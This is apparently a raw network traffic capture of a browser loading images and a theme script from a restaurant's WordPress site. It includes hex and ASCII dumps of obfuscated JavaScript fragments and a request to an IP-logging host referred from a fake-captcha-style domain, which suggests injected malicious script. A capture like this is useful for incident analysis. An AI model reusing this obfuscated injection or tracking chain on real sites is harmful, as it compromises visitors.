2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 78 31 31 31 38 36 37 2c 5f 30 78 34 36 31 62 65 39 2c 5f 30 78 32 63 38 37 65 62 2c 5f 30 78 34 39 66 30 62 32 2c 5f 30 78 34 38 66 35 33 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 38 32 28 5f 30 78 34 38 66 35 33 63 2d 30 78 37 33 2c 5f 30 78 32 63 38 37 65 62 29 3b 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 35 64 34 32 2c 5f 30 78 39 61 30 64 39 31 29 7b 63 6f 6e 73 74 20 5f 30 78 35 34 33 35 32 30 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 37 62 38 66 35 28 5f 30 78 35 34 32 39 35 64 2c 5f 30 78 34 37 62 38 34 66 2c 5f 30 78 66 30 30 66 32 65 2c 5f 30 78 35 33 61 34 65 32 2c 5f 30 78 34 31 38 63 38 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 36 65 37 39 28 5f 30 78 35 34 32 39 35 64 2d 30 78 34 37 2c 5f 30 78 34 37 62 Data Ascii: x111867,_0x461be9,_0x2c87eb,_0x49f0b2,_0x48f53c){return _0x4582(_0x48f53c-0x73,_0x2c87eb);}return function(_0x3b5d42,_0x9a0d91){const _0x543520={};function _0x17b8f5(_0x54295d,_0x47b84f,_0xf00f2e,_0x53a4e2,_0x418c85){return _0x456e79(_0x54295d-0x47,_0x47b
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 31 38 31 36 34 64 5b 5f 30 78 34 64 33 62 37 37 28 30 78 33 39 35 2c 30 78 32 33 62 2c 30 78 33 35 32 2c 30 78 32 61 36 2c 30 78 33 34 61 29 5d 29 2c 5f 30 78 35 31 36 39 31 34 3d 21 5b 5d 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 35 65 65 31 36 38 3d 5f 30 78 65 35 34 31 66 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 36 31 39 34 3d 7b 27 70 64 78 45 48 27 3a 5f 30 78 33 38 33 66 66 35 5b 5f 30 78 31 61 35 65 39 37 28 2d 30 78 62 36 2c 2d 30 78 37 34 2c 2d 30 78 61 66 2c 2d 30 78 31 35 36 2c 2d 30 78 39 65 29 5d 2c 27 46 67 4a 73 6f 27 3a 5f 30 78 33 38 33 66 66 35 5b 5f 30 78 33 65 35 30 66 61 28 30 78 61 64 2c 2d 30 78 31 33 66 2c 2d 30 78 34 31 2c 2d 30 78 33 33 2c 2d 30 78 39 29 5d 2c 27 46 55 6c 6e 4d 27 3a 5f 30 78 33 38 Data Ascii: 18164d[_0x4d3b77(0x395,0x23b,0x352,0x2a6,0x34a)]),_0x516914=![];else{const _0x5ee168=_0xe541f?function(){const _0x3a6194={'pdxEH':_0x383ff5[_0x1a5e97(-0xb6,-0x74,-0xaf,-0x156,-0x9e)],'FgJso':_0x383ff5[_0x3e50fa(0xad,-0x13f,-0x41,-0x33,-0x9)],'FUlnM':_0x38

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:39 UTC	397	OUT	GET /wp-content/uploads/2018/04/logo21.png HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	551	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/png content-length: 18501 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Fri, 06 Jul 2018 00:19:06 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b3 00 00 00 b3 08 06 00 00 00 c2 14 2d f3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 22 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20 Data Ascii: PNGIHDR-tEXtSoftwareAdobe ImageReadyqe<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 1e 9f 5b 95 9a 4b d3 9f f8 1b 2c 17 21 aa b0 f9 13 1f 2f ac be f6 da e0 f7 40 69 bc f5 fd 1f a8 53 1e 71 cd fc 3f be 8b e0 cc 02 32 37 0e ef 37 62 63 00 c8 5b 17 3a a8 17 ac 64 86 e2 77 51 e9 82 3e 9f 24 d6 d6 87 26 6d be 29 38 08 de c5 c9 4f 4a 57 0e 00 e4 4f ff fd ab bd ef 07 20 3f f3 b9 cf 46 7d 17 c0 2a 37 c6 37 1e b8 3f fd 6e 48 72 48 f8 7d 7b f7 a5 3f 43 f7 41 d3 e0 1d 1f f9 6b eb 75 04 6a 31 00 ea f5 0b 95 7e 2c 48 30 3b c5 6e c3 c0 b5 d7 f6 ed b8 e7 9e e0 6b 01 a6 18 89 66 49 5d 00 39 66 f4 5d 76 b9 17 60 1f 4a 80 35 78 d3 4d d1 f7 96 6c 50 fc 98 48 4e 84 be ff f3 bd fd e6 6b 00 ee b7 5e 7f 43 8d 2e e9 4d 8b d1 a4 8d 5b d2 8f a1 f9 a2 28 ba 93 18 8e a1 e0 a9 71 fa 02 03 31 24 ca 16 58 27 70 fc 67 01 99 8b 1a 2b 95 37 25 74 20 16 c0 5a 59 f3 7d 3e Data Ascii: [K,!/@iSq?277bc[:dwQ>$&m)8OJWO ?F}*77?nHrH}{?CAkuj1~,H0;nkfI]9f]v`J5xMlPHNk^C.M[(q1$X'pg+7%t ZY}>
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 61 36 23 f0 4e 9f 6b 20 87 14 bd 29 41 33 42 12 10 b4 03 12 0d 52 1b 20 8a 01 1b b8 a9 e4 95 5a ea 8e 26 52 ee 5e f7 fd 88 c5 68 26 7d a9 d9 b0 53 39 07 d8 4c 54 fc 70 0d 38 75 70 ed d8 e8 dd ca 61 c4 b9 c8 1a 9a ca f8 ae 91 ca 28 ad 30 4d 64 bd 00 d0 cb 13 40 0f cd 06 be 3a e6 23 90 7d 03 5c 11 0b 11 92 50 3c 8e b5 ad f9 c7 e5 c3 0d af 63 fc 30 2d 03 55 2b c7 8e 1a 57 6f 53 38 e5 8c 0d 7a 01 01 6e 98 0f 17 2f 5e 64 2a b6 00 3a ac 3b 3e 8a 02 a9 6b 81 d4 0a 5f c5 06 07 b7 e7 c6 16 6e fc 4a 40 ff 99 15 5b 74 c7 42 01 32 17 af cb c5 46 84 22 c3 f4 e2 f8 28 4a 6a 53 ba ec f2 9a 84 cb d2 e8 49 7d f2 58 28 66 73 d0 6a 61 01 16 9b b6 ca b9 6f 6a 98 0b fc cd ba 27 cc 33 2c 46 d6 e6 68 a2 2e c8 d0 4c 53 8e d3 16 0a 90 49 35 7e fd e4 93 85 9f 3c f1 44 2d 90 5e 0f Data Ascii: a6#Nk )A3BR Z&R^h&}S9LTp8upa(0Md@:#}\P<c0-U+WoS8zn/^d*:;>k_nJ@[tB2F"(JjSI}X(fsjaoj'3,Fh.LSI5~<D-^
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 15 38 43 e3 56 67 69 38 f2 ab 23 93 4f 3d f5 54 2f dd cc fa 78 22 cf d6 c1 f8 be 63 ce 18 f3 26 6b 78 16 01 1e b4 0a 38 27 c5 8a ac 2c 78 26 14 20 12 4f 7a 02 41 03 29 58 aa 35 47 06 4c b3 2a ad 25 5d 2e 64 35 47 4a 16 85 63 53 74 a3 69 ce ec e8 c5 ee ac d7 f5 b8 a3 06 f1 c6 56 98 e1 80 ab 91 66 4d 28 26 41 2a 25 94 1a 19 ae 6e 1c a5 66 3d 07 78 e6 ac 16 63 ee c8 2e f1 6f c9 ff b7 24 bf e7 de 08 21 a7 8a 70 74 94 d4 c9 31 31 17 16 95 98 fa 24 92 47 23 46 9c e0 ae 26 01 d8 e1 a4 34 a9 e6 89 b3 71 a3 2c e6 e6 9a 66 ea 71 b4 02 e6 c3 31 52 19 13 41 40 fa 14 02 1f a0 35 b8 23 80 5c 76 13 31 eb 74 21 01 f2 70 02 e4 61 0f 88 37 84 f4 0a 67 61 d9 38 db d5 36 9d 8b 1c 80 ee cd 12 48 0c 5a 0a 0d 48 6e 8f 29 34 ef 28 3b 7a 98 6b 93 77 36 39 09 c3 31 40 66 12 26 87 Data Ascii: 8CVgi8#O=T/x"c&kx8',x& OzA)X5GL%].d5GJcStiVfM(&A%nf=xc.o$!pt11$G#F&4q,fq1RA@5#\v1t!pa7ga86HZHn)4(;zkw691@f&
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 23 cc 3a 6c c2 88 5d 29 d3 73 b4 65 e4 cf 2e fb b3 4a 8c 02 35 03 63 b9 8e 19 ce d8 e0 bd ea b4 01 7d 18 f7 44 a8 c1 c3 57 71 16 a2 5e 07 fa 15 e2 01 bd e0 ec f9 d4 a2 2c a1 02 a0 4b 65 cd 99 43 83 f1 d1 ac a4 2a 87 a6 13 59 71 1f 9c f7 90 bb bf 33 83 62 0c 16 8c 8c 5f fd ff cd 4e e9 83 b2 07 49 8b 1d bc 3c bd 09 db 6d 2d e9 45 a8 35 01 26 e3 db 8f 7e 7b 68 8e f2 f4 4a 05 15 cc 8e f1 c7 97 2c fa 53 9f 84 60 84 19 c6 79 af 38 ef d1 64 33 bc e1 a5 2f 7b a9 b6 3d 55 78 54 82 2b e3 c4 71 3f e5 63 4e e3 aa ad 53 29 39 79 fb ae b8 ea ca 8d a1 f7 e9 94 36 fc df 6a 12 04 bc 58 66 bd 98 5e 31 21 ca 9b 25 99 d7 58 b6 41 69 76 42 4c 2b 76 15 2e 6e 4f da e8 65 69 ed a2 b0 23 61 6f 0c 05 e4 cb 02 d9 1e 7a 31 3e 07 8b 09 89 b9 c7 70 6e 14 9f 7b ee b9 34 9a e6 b4 d3 4f Data Ascii: #:l])se.J5c}DWq^,KeC*Yq3b_NI<m-E5&~{hJ,S`y8d3/{=UxT+q?cNS)9y6jXf^1!%XAivBL+v.nOei#aoz1>pn{4O
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 1c e1 79 6b e8 54 96 0e 13 ea 53 31 92 d7 d2 cb d4 e8 ad b3 fc 18 9a 7c 30 35 ca d7 bc c5 6a b9 a0 bd 41 19 45 42 2e 68 67 ac 72 a8 c0 89 6c 85 c0 1a ce d8 68 07 0f 1c 4c ff 0e 29 5a d5 be 77 d5 fa 4c 23 20 0a f7 03 bb 28 00 0c 30 e2 ff 55 7d a0 3b fd 5d 16 50 c7 6b b0 d1 b9 f1 77 38 73 24 ad 40 dc d8 b8 06 7a bf 08 70 6c 1a cc 27 37 1b 4e 8b 6a 01 f6 1d 85 47 1f 7d b4 4e 62 c3 45 ac 2a 45 61 0e 37 ce 66 9b 5f 07 a8 a3 fa 79 5e 1b 9b 86 c6 0c dd b0 34 70 92 73 d4 aa 1f 69 c9 9c 99 de ae 83 ab 39 1e 32 ea 26 eb 1b 78 c8 5f 7c 7a a2 cd 40 86 14 6e e8 ab c2 66 98 34 19 d1 ee 0d 80 3e fb ec b1 b4 58 36 1e 90 ca 77 b8 d3 85 06 7d 0c 48 50 4a e2 c5 29 48 8f a7 ff c7 7d 02 90 3d ae 50 7a 55 81 d9 91 3e 78 22 e1 33 01 64 82 1a 0b 84 cd 8f e7 71 3d f8 1b a3 cc 68 Data Ascii: ykTS1\|05jAEB.hgrlhL)ZwL# (0U};]Pkw8s$@zpl'7NjG}NbE*Ea7f_y^4psi92&x_\|z@nf4>X6w}HPJ)H}=PzU>x"3dq=h
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 4e d8 6a f7 3a df c8 90 d4 13 4d 4a e5 be 82 8a b7 06 30 e0 c8 20 17 96 85 cb 21 a5 64 25 4b 1e e7 6c 44 23 81 4c 6b 07 62 07 c8 47 ef 14 c9 06 00 04 1d 44 00 0f 5d ae ba 47 b5 ee 5d 28 25 3e bd 7f f8 6c 7c 27 5f 8b ef 71 d9 cb c7 f9 5e 80 b5 5b 5c 33 bf 8b c0 64 c5 54 de 37 6b fc 49 e5 90 9b 15 d7 eb 29 9b 55 74 8e 96 de 66 01 9d f3 b4 0d 5a af 06 e2 ca 0e 68 4c 94 3a 09 0e f2 3d da 8d 29 29 08 00 4e 8e 2c 51 2a 17 58 03 ab da 52 78 59 96 1b b3 59 7e 35 aa 37 0c 4d 66 74 2c 50 42 dd 21 1c 21 34 ad 71 48 90 33 2e 19 af 7d 28 8d 14 dc 57 03 f7 8e 5a f1 c7 65 35 3e 4e de 4f 80 6a 93 9c d5 18 d2 02 38 14 41 96 fe 75 7a 44 fa 3a ce e9 94 b3 ae e0 5a 24 55 00 cf 06 30 f9 fd d2 26 ce 8d 8c 9f b8 76 79 fa 48 7a e5 91 d0 2d 71 e8 ac 7a 70 4e b8 79 15 4f 6e b8 26 Data Ascii: Nj:MJ0 !d%KlD#LkbGD]G](%>l\|'_q^[\3dT7kI)UtfZhL:=))N,Q*XRxYY~57Mft,PB!!4qH3.}(WZe5>NOj8AuzD:Z$U0&vyHz-qzpNyOn&
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 5a ed 16 ce 43 0d 9b 53 5b 47 a4 b9 8f d7 c8 4c 14 ad db 58 9b c0 d3 ca 21 54 44 13 eb b3 36 ef ba d2 ba 82 b5 61 9b 88 fa d6 10 5d de f7 ee 50 b4 b6 25 30 33 ee b7 8d 6d 65 43 a3 4f 3f 41 cd 5f 4b 49 79 83 8b 0d d7 b1 96 c0 12 48 12 b4 f5 8e 91 65 4d 5f b8 04 ad 1c 5d 01 cf e1 52 cf e6 d1 a7 04 37 a7 e6 da 52 a1 22 60 e9 48 91 82 47 4a 7a b9 d1 a5 69 52 5a 0a 7c 54 c3 15 85 a9 fb db 15 57 5d 19 25 a9 09 62 b6 89 90 42 b0 19 b3 67 67 96 72 e7 d3 ce db dc bd 3e 34 96 5b 5c 6b 5a 44 a9 9d 90 66 07 cd 9b 95 12 58 c6 c4 5a a0 d5 c0 97 f6 dc 18 80 c7 d8 4a e5 46 3b a8 b8 71 c8 11 23 81 2b ad 03 94 a6 d5 f8 8e 5d 0d 74 42 46 e6 59 3c 9c 65 15 42 f7 f7 d1 cd 9b 76 fa 68 46 41 64 0b c1 84 37 38 74 53 a6 a4 66 38 ae 3e d9 a9 77 65 81 d9 2b 99 2f be f8 e2 dc bc 79 Data Ascii: ZCS[GLX!TD6a]P%03meCO?A_KIyHeM_]R7R"`HGJziRZ\|TW]%bBggr>4[\kZDfXZJF;q#+]tBFY<eBvhFAd78tSf8>we+/y
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 1a b0 21 ae aa 37 c8 94 27 86 b9 9d e6 a9 fa d8 e8 e9 4c 9a d8 f8 9e c6 a2 3e da b1 42 c0 24 8a de 88 47 2a 6e f7 29 7f fc 0e 2b 6e 86 98 92 65 2b ac 84 e1 88 93 b3 5c 07 e6 84 b7 57 b4 44 93 37 6f 3d af 8f 35 4e 0c be 3c a3 19 8f 36 ed e4 a2 1a 04 e5 b6 2f 7c f1 f7 ac 8f cc 8e 57 f8 6e cd a3 19 f6 89 eb 95 d7 64 d9 5e f9 9c 06 06 27 d6 67 ab 8e b5 3e b4 7b d4 7f ee 71 ef e6 99 f6 94 0e d3 f5 a3 31 1e fc d6 b7 8e 1b 5f b5 c7 63 cd 28 b3 3c 97 4f a1 f7 39 ae 60 bd c0 a3 be 07 fb ae 06 61 b3 cf de 5c 72 fc b4 0e cc 89 f0 9b f0 69 bc bc 98 3b 54 e1 67 00 47 be 07 d1 4e 30 cf c1 03 87 f1 0d 51 7d b2 55 de ec 3a 0a 95 e5 f5 fc e6 37 bf e9 24 38 59 40 04 d2 59 96 d1 92 c1 ea b0 be c8 0a ee 5c 40 3b 37 6d 2a 17 ff 6f 36 27 b0 7d 40 8e fb 9b 5e 63 c6 71 c8 d3 ec Data Ascii: !7'L>B$Gn)+ne+\WD7o=5N<6/\|Wnd^'g>{q1_c(<O9`a\ri;TgGN0Q}U:7$8Y@Y\@;7mo6'}@^cq
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: f9 99 d5 2a ff a3 b5 eb d2 01 5e 30 9f 52 11 97 8a b7 2c 4f f6 50 f6 89 df d0 73 dd 07 e6 fb 62 a9 06 4b a1 ea 32 51 2d 8c b5 21 e9 6c 15 ea c3 4d 25 8f 15 72 d2 c1 b7 6e 76 b5 17 d8 b5 34 6b a7 03 c0 68 00 29 ed d6 ad d2 0c 6b 4e 68 16 ec 69 73 c8 68 d6 9a 41 12 b3 1f a2 4f a1 fa 4f 57 bc 71 ec fa 1b 6f a8 08 8b 45 c5 ca ca c6 1a 1d 39 f2 ab b5 3e c1 40 2a 35 90 21 10 f0 5a 08 42 80 5b 3a db 64 d8 81 67 34 84 05 37 25 99 2d b3 95 6c f0 d3 06 e9 1c 6a 54 ae f3 cd 4c 0e 0d bb b3 74 5d b3 61 0f 41 ed 93 d4 ed 00 18 4d 9a be cd 8d eb 6a a7 54 ce da 54 f2 be 43 96 01 9c 70 ff 71 e5 ca 21 d5 d7 cf 37 d6 7d f5 cb 5f 29 6a 60 ca 46 9d fa 3a 70 22 c8 82 ef f2 7d 55 ee 7c 53 8d 86 45 d8 9a 1b 30 da 11 d0 52 77 16 02 be 76 b6 df 7a 28 8d 3d dd d5 6e 45 10 e3 82 26 Data Ascii: ^0R,OPsbK2Q-!lM%rnv4kh)kNhishAOOWqoE9>@5!ZB[:dg47%-ljTLt]aAMjTTCpq!7}_)j`F:p"}U\|SE0Rwvz(=nE&
2025-10-17 06:51:39 UTC	415	OUT	GET /wp-content/uploads/2019/05/fat-shallot-chicago-tall.jpg HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	553	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/jpeg content-length: 137755 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Thu, 30 May 2019 18:11:50 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:39 UTC	408	OUT	GET /wp-content/uploads/2025/04/untitled-design-1.png HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	552	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/png content-length: 262116 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Tue, 22 Apr 2025 13:41:45 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:39 UTC	416	OUT	GET /wp-content/uploads/2022/02/fat-shallot-gillson-beach.jpg HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	553	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/jpeg content-length: 242102 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Fri, 04 Feb 2022 22:34:08 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:39 UTC	406	OUT	GET /wp-content/uploads/2025/04/untitled-design.png HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	552	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/png content-length: 267943 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Tue, 22 Apr 2025 13:40:52 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:39 UTC	419	OUT	GET /wp-content/uploads/2023/02/fat-shallot-merchandise-mart.png HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	552	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/png content-length: 258716 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Mon, 06 Feb 2023 23:26:07 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:40 UTC	406	OUT	GET /wp-content/uploads/2018/06/fatshallottruck.png HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:40 UTC	552	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:13 GMT content-type: image/png content-length: 709630 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Fri, 06 Jul 2018 00:22:37 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:42 UTC	396	OUT	GET /wp-content/uploads/2013/01/logo1.png HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:42 UTC	551	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:16 GMT content-type: image/png content-length: 52426 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; cache-control: max-age=315360000 last-modified: Mon, 06 Feb 2017 18:04:01 GMT accept-ranges: bytes expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding,Accept server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
2025-10-17 06:51:42 UTC	434	OUT	GET /wp-content/themes/jupiter/assets/js/plugins/async/min/jquery.flexslider.js HTTP/1.1 host: thefatshallot.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:42 UTC	565	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:17 GMT content-type: text/javascript; charset=utf-8 content-length: 22197 x-sucuri-id: 15003 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN x-content-type-options: nosniff content-security-policy: upgrade-insecure-requests; last-modified: Thu, 11 Sep 2025 17:43:09 GMT cache-control: max-age=315360000 expires: Thu, 31 Dec 2037 23:55:55 GMT vary: Accept-Encoding server: Sucuri/Cloudproxy x-sucuri-cache: MISS alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000 accept-ranges: bytes

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:39 UTC	582	OUT	GET /1uzGZ4 HTTP/1.1 host: 2no.co sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: image sec-fetch-storage-access: active referer: https://cptchdm.icu/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-10-17 06:51:39 UTC	1460	IN	HTTP/1.1 403 Forbidden date: Fri, 17 Oct 2025 06:51:39 GMT content-type: text/html; charset=UTF-8 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cf-mitigated: challenge critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin origin-agent-cluster: ?1 permissions-policy: 